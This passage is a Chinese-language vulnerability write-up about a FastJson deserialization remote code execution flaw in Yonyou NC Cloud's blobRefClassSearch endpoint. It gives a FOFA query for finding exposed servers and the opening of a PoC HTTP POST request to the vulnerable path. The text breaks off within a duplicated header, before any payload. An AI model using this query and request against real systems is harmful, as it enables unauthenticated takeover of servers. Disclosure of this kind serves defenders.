0x01 產品簡介

用友 NC Cloud 是一種商業級的企業資源規劃云平臺，為企業提供全面的管理解決方案，包括財務管理、采購管理、銷售管理、人力資源管理等功能，實現企業的數字化轉型和業務流程優化。

0x02 漏洞概述

用友 NC Cloud blobRefClassSearch 接口處存在FastJson反序列化漏洞，未經身份驗證的遠程攻擊者可通過該漏洞在服務器端任意執行代碼，寫入后門，獲取服務器權限，進而控制整個web服務器。

0x03 復現環境

FOFA：app="用友-NC-Cloud"

0x04 漏洞復現

PoC

POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/1